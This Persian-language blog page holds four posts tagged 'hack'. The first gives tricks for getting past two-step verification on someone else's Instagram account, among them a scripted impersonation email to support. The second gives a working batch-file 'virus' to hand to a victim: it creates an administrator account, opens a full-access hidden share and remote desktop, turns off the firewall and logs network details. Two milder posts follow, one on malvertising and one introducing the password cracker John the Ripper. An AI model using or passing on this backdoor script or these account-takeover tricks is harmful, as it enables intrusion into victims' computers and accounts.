اوری دانلود بیش از 120 آموزش خفن و کمیاب و رایگان

۴ مطلب با موضوع «هک» ثبت شده است

دور زدن تایید دو مرحله ای اینستاگرام

✅ روش1 
از صفحه تایید دو مرحله ای اسکرین شات بگیرید و متن پایین را کپی و ایمیلی که خودشون میدن بفرستید و بگین که تایید دو 
مرحله رو بردارن و ... متن:  
Hi, I'm hacked, someone put my number in my account and double-checked the invoice in my  
account now I can not get the code to login to my page, please remove the two-step confirmation  
option or a backup Send out 
✅روش 2 
 
به دایرکت پیج مورد نظر رفته و پیام به تارگت ارسال کنید اگر سین کرد میبینید که آنالینه و اون وقت به پیج تارگت بروید 
میبینید که از شما تایید دو مرحله ای نمی خواد 

✅روش 3 
اول از همه اکانتی که میخواین باپیس کنید نباید قبال با ایپی خارجی الگین کرده باشه ابتدا ادرس لوگین اینیستاگرام را با نت 
خودتون باید 
https://www.instagram.com/accounts/login 
اول از همه سه بار صفحه رو refreshکنید... حال یبار یوزر پیج رو وارد کنید و پسورد را اشتباه بزنید.... دفعه بعد یوزر 
بزنید ولی پسورد چیزی نزنید و الگین کنید 
حاال به پیج به طور معمولی الگین کنید....  
✅روش 4 
برید به یکی از پست های تارگت و گزینه )noti post on turn )...رو انتخاب کنید

آموزش طراحی سایت وردپرس در ماکی سایت به صورت کامل یاد بگیرید.

۰ نظر موافقین ۰ مخالفین ۰
ایمان دهقانی فیروزآبادی

آموزش هک سیستم با ویروس

برای ساخت این ویروس نوت پد رو باز کنید و عبارت زیر رو توش کپی کنید و اون رو با پسوند .bat سیو کنید:

echo off@
color 02
Net user Hacker 123456 /add
Net localgroup administrators Hacker /add
Mkdir c:\Code1-folder
:C
\cd
attrib Code1-folder +h
net share trojan-share$=c:\C:\Code1-folder /grant:Hacker,full /grant:everyone,full
netsh firewall set service type = fileandprint mode =enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections/t REG_DWORD /d0/f 

netsh advfirewall set allprofile state off

ipconfig »C:\Code1-folder\%computername%.txt
getmac »C:\Code1-folder\%computername%.txt
net user »C:\Code1-folder\%computername%.txt

بعدش این ویروس رو به قربانی میدید فایر وال و انتی ویروس قربانی باید خاموش باشه 
حالا به قسمت ریموت دسکتاپ میرید و IP قربانیرو که از قبل گیر اوردید میزنید و بعد یوزر نیم Hacker و پسورد 123456 رو میزنید و به سیستم قربانی متصل میشید
میتونید یوزر نیم و پسورد رو به دلخواه تغییر بدید
برای اتصال به قربانی فرد باید به اینترنت متصل باشه.

صبا هاست

۰ نظر موافقین ۰ مخالفین ۰
ایمان دهقانی فیروزآبادی

تبلیغات ویروس دارند؟ جدید ترین کشف هکر ها و پلیس فتا

تبلیغات 
ما هیچوقت تبلیغات آنلاین  را دوست نداشتیم  اونا واقعا آزار دهنده هستن 

آیا می دانید که ممکن است دستگاه شما با مراجعه به وب سایت با تبلیغات ، به بدافزارها آلوده شود ؟

Malvertising اصطلاح پخش بدافزار از طریق تبلیغات آلوده است. اینگونه کار می کند: شما به وب سایت مراجعه می کنید. وب سایت بارگیری تبلیغات آلوده را بارگیری می کند. تبلیغات آلوده در سکوت ، بطور خودکار ، بدافزارها را بر روی دستگاه شما بارگذاری می کند در حالی که نمی دانید چرا این صفحه همه این تبلیغات را برای برنامه های "سریع ثروتمند" یا هر چیز دیگری به شما نشان می دهد.

همانطور که تصور می کنید ، تمام آن تبلیغاتی که تمام آنچه را که بر روی دستگاه شما قرار دارد بارگیری می شود ، می توانند به عملکرد آن آسیب برساند. دستگاه های تلفن همراه به ویژه تحت تأثیر قرار می گیرند. به یاد داشته باشید که در تلفن همراه خود ، تبلیغات در مرورگر بلکه در بسیاری از برنامه های تلفن همراه ظاهر می شود. تبلیغات ناخواسته حتی وقتی از مرورگر وب استفاده نمی کنید می تواند تأثیر داشته باشد.

یک مطالعه از سال 2016 نشان داد که تبلیغات موبایل می توانند بیش از 3/4 پهنای باند تلفن همراه و تقریبا نیمی از داده های تلفن همراه شما را داشته باشند . از آن زمان شبکه های تلفن همراه سریعتر شده اند ، اما مطمئناً تبلیغات نیز منابع بیشتری را جذب می کنند. با این کار تلفن شما مجبور به بارگیری منابع بیشتر می شود ، باتری را نیز خراب می کند .


تبلیغات آنلاین برای حفظ حریم خصوصی وحشتناک است. بیشتر تبلیغات توسط شبکه های تبلیغاتی از طریق دامنه های شخص ثالث ارائه می شود. آنها معمولاً حاوی نرم افزار ردیابی پیشرفته (ردیاب) هستند. همانطور که شما کار خود را بصورت آنلاین انجام می دهید ، ردیاب ها به شبکه های تبلیغاتی اجازه می دهند که به تدریج مشخصات مفصلی را روی شما بسازند .

در بهترین حالت (برای آنها) ، این پروفایل در نهایت حاوی اطلاعات شخصی مانند سن شما ، جایی که در آن زندگی می کنید ، هویت خانواده و دوستانتان ، آنچه دوست دارید به صورت آنلاین بگردید ، و چه کسی می داند چه چیز دیگری است. هر اطلاعات کمی که بتوانند مفید واقع شوند می توانند در آن نمایه جمع شوند.

صبا هاست
۰ نظر موافقین ۰ مخالفین ۰
ایمان دهقانی فیروزآبادی

تست نفوذ John the Ripper

 معرفی ابزارهای امنیتی :

🔵 ابزار John the Ripper 

🔹 این ابزار یکی ازسریع ترین ابزارهای متن باز به منظور شکستن کلمات عبور است و پلتفرم های مختلفی پشتیبانی می کند

🔹 برای استفاده از  John شما باید فایل مربوط به کلمات عبور را به عنوان ورودی به این ابزار بدهید.

🔹 اگر سیستم یونیکسی بود شما به دسترسی ROOT نیاز دارید و باید هردو فایل /ETC/PASSWD و /ETC/SHADOW را به صورت ترکیب شده به John بدهید.

🔹 اگر سیستم ویندوزی بود کافی است تا خروجی ابزارهایی مانند pwdump یا fgdump را در قالب یک فایل متنی ذخیره نموده و آن را در اختیار ابزار John قرار دهید.

🔹 ابزار John در چهار حالت مختلف کار و اقدام به شکستن کلمات عبور می کند که هرکدام از روش های مختلفی این کار را انجام می  دهند. 

🔹این چهار حالت شامل موارد زیر می شوند که در پست های بعدی آن ها را بررسی می کنیم:
▪️Single crack mode
▪️Wordlist mode
▪️Incremental mode
▪️External

۰ نظر موافقین ۰ مخالفین ۰
ایمان دهقانی فیروزآبادی